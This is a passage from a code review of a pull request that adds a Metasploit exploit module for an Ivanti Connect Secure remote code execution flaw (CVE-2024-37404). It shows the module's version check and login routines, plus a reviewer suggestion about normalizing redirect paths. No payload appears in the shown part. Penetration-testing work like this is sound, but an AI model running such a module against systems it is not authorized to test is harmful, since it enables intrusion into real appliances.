modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_37404.rb

```diff
@@ -0,0 +1,431 @@
+    end
+  end
+
+  def get_version
+    print_status('Getting the version...')
+
+    uri = normalize_uri(target_uri.path, '/dana-admin/sysinfo/sysinfo.cgi')
+    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => 'true')
+    raise IvantiUnknownError, "[get_version] No response from '#{uri}'" if res.nil?
+
+    version_str = res.get_html_document.xpath('//span[@id="DSIDSystemSoftwarePkgVersion"]').text
+    raise IvantiNotFoundError, '[get_version] Could not find the version number' if version_str.empty?
+
+    print_good("Found version #{version_str}")
+    unless version_str.match(/(\d+\.[\dR]+)/)
+      raise IvantiNotFoundError, "[get_version] Unexpected version number format: #{version_str}"
+    end
+
+    Rex::Version.new(Regexp.last_match(1))
+  end
+
+  def check
+    begin
+      login_admin
+      @logged = true
+    rescue IvantiError => e
+      return CheckCode::Unknown("Unable to login to the administrative interface: #{e}")
+    end
+
+    begin
+      version = get_version
+    rescue IvantiError => e
+      return CheckCode::Detected("Version number not found: #{e}")
+    end
+
+    unless version < Rex::Version.new('22.7R2.1')
+      return CheckCode::Safe("Version number: #{version}")
+    end
+
+    return CheckCode::Appears
+  end
+
+  def confirm_login_user(uri)
+    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => 'true')
+    raise IvantiUnknownError, "[login_user] No response from '#{uri}'" if res.nil?
+
+    form_data_str = res.get_html_document.xpath('//form/input[@id="DSIDFormDataStr"]/@value').text
+    raise IvantiNotFoundError, '[login_user] Could not find the FormDataStr token' if form_data_str.empty?
+
+    uri = normalize_uri(target_uri.path, '/dana-na/auth/url_default/login.cgi')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => uri,
+      'keep_cookies' => 'true',
+      'vars_post' => {
+        'btnContinue' => 'Continue the session',
+        'FormDataStr' => form_data_str
+      }
+    )
+    raise IvantiUnknownError, "[login_user] No response from '#{uri}'" if res.nil?
+
+    res
+  end
+
+  def login_user
+    print_status(
+      "Login to the user interface with username '#{datastore['USERNAME']}' and password "\
+      "'#{datastore['PASSWORD']}'..."
+    )
+
+    uri = normalize_uri(target_uri.path, '/dana-na/auth/url_default/login.cgi')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => uri,
+      'keep_cookies' => 'true',
+      'vars_post' => {
+        'tz_offset' => '',
+        'win11' => '',
+        'clientMAC' => '',
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        'realm' => 'Users',
+        'btnSubmit' => 'Sign In'
+      }
+    )
+    raise IvantiUnknownError, "[login_user] No response from '#{uri}'" if res.nil?
+
+    if res.code == 302 && res.redirection.to_s == '/dana-na/auth/url_default/welcome.cgi?p=user%2Dconfirm'
```

Comment:
I noticed there were a couple instances through out there PR where `res.redirection` gets checked. I was wondering if the presence of a `TARGET_URI` might cause these checks to fail? If so, this might help:
```suggestion
    if res.code == 302 && res.redirection.to_s == normalize_uri(target_uri.path, '/dana-na/auth/url_default/welcome.cgi?p=user%2Dconfirm')
```

Reply:
Very good point! Thank you for catching this.